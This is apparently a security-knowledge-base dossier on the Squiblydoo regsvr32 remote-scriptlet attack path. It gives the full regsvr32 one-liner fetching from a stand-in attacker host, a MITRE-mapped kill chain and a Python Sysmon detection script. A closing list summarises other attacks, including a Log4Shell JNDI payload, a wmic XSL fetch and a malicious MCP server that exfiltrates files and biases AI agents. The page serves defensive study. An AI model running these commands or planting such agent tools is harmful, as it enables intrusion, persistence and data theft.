Squiblydoo: regsvr32 → remote SCT execution
`regsvr32.exe /s /n /u /i:http://attacker/x.sct scrobj.dll`. AppLocker / SRP often allow regsvr32 because it is a signed Microsoft binary — the attacker's JS runs in its context.
§ Context
Assumed environment: target enforces application allowlisting that trusts signed Microsoft binaries. End user can run regsvr32 (true on every Windows endpoint).
§ Steps
- 01 JS stager loads beacon | Execution | T1059 — Command and Scripting Interpreter
- 02 Deliver one-liner to user | Initial Access | T1566 — Phishing
- 03 Host attacker .sct on the web | Resource Development | T1583 — Acquire Infrastructure
- 04 regsvr32 fetches + runs SCT | Execution | LOL-REGSVR32 — regsvr32.exe /i Scriptlet (Squiblydoo)
- 05 WMI event subscription persistence | Persistence | LOL-SCRCONS — scrcons.exe WMI Event Subscription
§ References
§ Frequently asked
- What is the "Squiblydoo: regsvr32 → remote SCT execution" attack path?
- `regsvr32.exe /s /n /u /i:http://attacker/x.sct scrobj.dll`. AppLocker / SRP often allow regsvr32 because it is a signed Microsoft binary — the attacker's JS runs in its context. It chains 5 steps drawn from real-world offensive-security techniques.
- What starting position does this attack require?
- The first step is JS stager loads beacon (T1059), an execution primitive. Assumed environment: the target enforces application allowlisting that trusts signed Microsoft binaries.
- What is the final impact of this kill-chain?
- The final step lands on WMI event subscription persistence (LOL-SCRCONS), which falls under Persistence. From here, an operator typically pivots into post-exploitation or maintains persistence.
- How can defenders detect or prevent this attack?
- Detection and prevention vary per step. Refer to each linked MITRE ATT&CK entry under "References" — every technique on that page lists defensive controls, detection telemetry, and known threat-actor usage.
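Detection logic for step 04, added here as an example that is not part of the original dossier or any vendor product: it scans constructed Sysmon-style process-creation events for regsvr32 launched with a `/i:` URL and `scrobj.dll`, which is the telemetry shape of Squiblydoo regardless of the scriptlet's file extension. Host names, file paths and the event field names are assumptions for illustration.

```python
import re

# Constructed sample events in Sysmon Event ID 1 (process creation) shape.
# Hosts, paths and values are assumed for illustration, not real telemetry.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\regsvr32.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": "regsvr32.exe /s /n /u /i:http://attacker.example/x.sct scrobj.dll"},
    {"Image": r"C:\Windows\SysWOW64\regsvr32.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\SysWOW64\regsvr32.exe" /s "C:\Program Files\Vendor\vendor.dll"'},
    # Extension and switch casing vary; scrobj.dll parses whatever body it gets.
    {"Image": r"C:\Windows\System32\regsvr32.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "REGSVR32 -S -U -I:HTTPS://cdn.example/a.png SCROBJ.DLL"},
]

# /i: or -i: whose argument is a URL: the scriptlet is fetched over the network.
REMOTE_INSTALL_ARG = re.compile(r"^[/-]i:(?P<url>(?:https?|ftp)://\S+)$", re.I)
OFFICE_PARENTS = ("winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe")

def tokenize(cmdline):
    """Split a Windows command line on whitespace, keeping quoted spans together."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]

def classify_regsvr32(event):
    """Return indicator strings for one process-creation event; empty list if benign."""
    if not event.get("Image", "").lower().endswith("regsvr32.exe"):
        return []
    indicators = []
    for tok in tokenize(event.get("CommandLine", "")):
        m = REMOTE_INSTALL_ARG.match(tok)
        if m:
            indicators.append("remote scriptlet: " + m.group("url"))
        if tok.lower().endswith("scrobj.dll"):
            indicators.append("scrobj.dll used as COM server (scriptlet host)")
    parent = event.get("ParentImage", "").lower().rsplit("\\", 1)[-1]
    if indicators and parent in OFFICE_PARENTS:
        indicators.append("spawned by Office process: " + parent)
    return indicators

def scan(events):
    """Map event index -> indicators for every event that looks like Squiblydoo."""
    hits = {}
    for i, ev in enumerate(events):
        ind = classify_regsvr32(ev)
        if ind:
            hits[i] = ind
    return hits

if __name__ == "__main__":
    for i, ind in scan(SAMPLE_EVENTS).items():
        print(i, SAMPLE_EVENTS[i]["CommandLine"], "->", ind)
```

A prevention-side counterpart is to block or constrain regsvr32 in the allowlisting policy rather than trusting it by signature alone; the scan above is the fallback telemetry check when it stays allowed.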
§ Related dossiers
- Shared techniques: 2
Malicious MCP server → silent supply chain for agent tools
User installs an MCP server marketed as a useful integration. Every subsequent agent session has the rogue server in scope — its tools log prompts, exfil files, or inject responses to bias the agent.
- Shared techniques: 2
Log4Shell (CVE-2021-44228) → RCE → lateral
Send `${jndi:ldap://attacker/x}` in any logged field (User-Agent / X-Forwarded-For). Vulnerable log4j 2.x resolves the JNDI URL, fetches a Java class from attacker LDAP, runs it as the app user.
- Shared techniques: 2
wmic + XSL → AppLocker / SRP bypass
wmic os get /format:'http://attacker/x.xsl' renders the result by fetching attacker XSL. The XSL contains JScript blocks — runs in wmic's signed-binary context, bypasses allowlisting.
- Shared techniques: 2
DNS rebinding → access internal router admin from a browser
Victim visits attacker page. JS opens a connection to attacker.com, which after the first request flips its DNS A record to 192.168.1.1 — subsequent requests now go to the victim's router under the attacker's origin.
- Shared techniques: 2
Rowhammer → bit flip → in-browser sandbox escape
JavaScript hammers adjacent DRAM rows for tens of seconds; an unlucky-for-defender bit flip in a page-table entry hands the attacker a write primitive into another mapping. RIDL-class chain to native code.
- Shared techniques: 2
Permissive SPF / DMARC p=none → CEO impersonation BEC
Target publishes SPF ~all and DMARC p=none. Send mail from attacker IP with a forged From: <ceo@target.com>; gateway delivers as-is. Combine with display-name spoof for a credible BEC.